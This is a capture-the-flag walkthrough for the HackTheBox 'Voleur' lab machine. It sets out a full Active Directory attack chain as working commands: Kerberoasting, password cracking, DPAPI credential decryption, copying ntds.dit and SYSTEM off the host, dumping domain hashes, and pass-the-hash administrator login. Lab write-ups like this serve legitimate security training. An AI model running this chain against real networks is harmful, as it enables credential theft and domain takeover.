This is a complete step-by-step guide for rooting the "Voleur" machine on HackTheBox. All commands are updated, concise, and demonstrate the reasons behind each action.

1. Initial Enumeration

Nmap scan reveals SSH service on port 2222:

nmap -A voleur.htb -p-

Only unusual open port is SSH (2222).

2. Kerberos/SMB Enumeration (Foothold)

We are given credentials:

  • Username: ryan.naylor

  • Password: HollowOct31Nyt

Since NTLM is disabled, use Kerberos:

impacket-getTGT 'VOLEUR.HTB/ryan.naylor':'HollowOct31Nyt'
export KRB5CCNAME=ryan.naylor.ccache
impacket-smbclient -k -no-pass VOLEUR.HTB/[email protected]

Explore the IT share → First-Line Support/Access_Review.xlsx (password-protected).

3. Cracking Excel Password

office2john Access_Review.xlsx > hash.txt
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

Open the Excel file after cracking to reveal more credentials.

4. BloodHound / Privilege Discovery

Excel shows svc_ldap has writespn over svc_winrm. Use these creds:

impacket-getTGT 'VOLEUR.HTB/svc_ldap:M1XyC9pW7qT5Vn'
export KRB5CCNAME=svc_ldap.ccache
python targetedKerberoast.py -k --dc-host dc.voleur.htb -d VOLEUR.HTB

Crack dumped Kerberoast hash:

john svc_winrm.txt --wordlist=/usr/share/wordlists/rockyou.txt

5. Shell Access with WinRM

impacket-getTGT 'VOLEUR.HTB/svc_winrm:<password>'
export KRB5CCNAME=svc_winrm.ccache
evil-winrm -i dc.voleur.htb -r voleur.htb

6. Privilege Escalation — Restoring Deleted User

Restore todd.wolfe using svc_ldap credentials:

bloodyAD --host dc.voleur.htb -d voleur.htb -u 'svc_ldap' -p 'M1XyC9pW7qT5Vn' -k set restore 'todd.wolfe'

7. Dump DPAPI Credentials

Get TGT for todd.wolfe:

impacket-getTGT 'VOLEUR.HTB/todd.wolfe:<password>'
export KRB5CCNAME=todd.wolfe.ccache
impacket-smbclient -k -no-pass VOLEUR.HTB/[email protected]

Download:

  • 772275FAD58525253490A9B0039791D3

  • 08949382-134f-4c63-b93c-ce52efc0aa88

Decrypt using DPAPI:

impacket-dpapi masterkey -file 08949382-134f-4c63-b93c-ce52efc0aa88 -password '<todd_password>' -sid S-1-5-21-3927696377-1337352550-2781715495-1110
impacket-dpapi credential -file 772275FAD58525253490A9B0039791D3 -key <masterkey>

This reveals jeremy.combs' password.

8. SSH as svc_backup via id_rsa

From Jeremy's SMB share, download id_rsa and login note.

SSH into box:

ssh -i id_rsa [email protected] -p 2222

9. Dumping AD Hashes

Navigate and copy:

cd /mnt/c/IT/Third-Line Support/Backups/Active Directory/
cp ntds.dit /tmp

cd /mnt/c/IT/Third-Line Support/Backups/registry/
cp SYSTEM /tmp

Transfer to attacker box:

scp -i id_rsa -P 2222 [email protected]:/tmp/ntds.dit .
scp -i id_rsa -P 2222 [email protected]:/tmp/SYSTEM .

Dump hashes:

impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL

10. Root Access

With dumped NTLM hash, get admin access:

impacket-getTGT 'VOLEUR.HTB/Administrator' -hashes <LM:NT>
export KRB5CCNAME=Administrator.ccache
evil-winrm -i dc.voleur.htb -r voleur.htb

Read root.txt from Administrator's Desktop.

Key Takeaways

  • Focus on Kerberos-based auth when NTLM is disabled.

  • Excel docs may reveal lateral movement or privilege paths.

  • Use BloodHound/LDAP/AD tools for privilege discovery.

  • DPAPI lets you extract chained secrets from users.

  • Every share and backup may lead to root.

Keep Reading


No posts found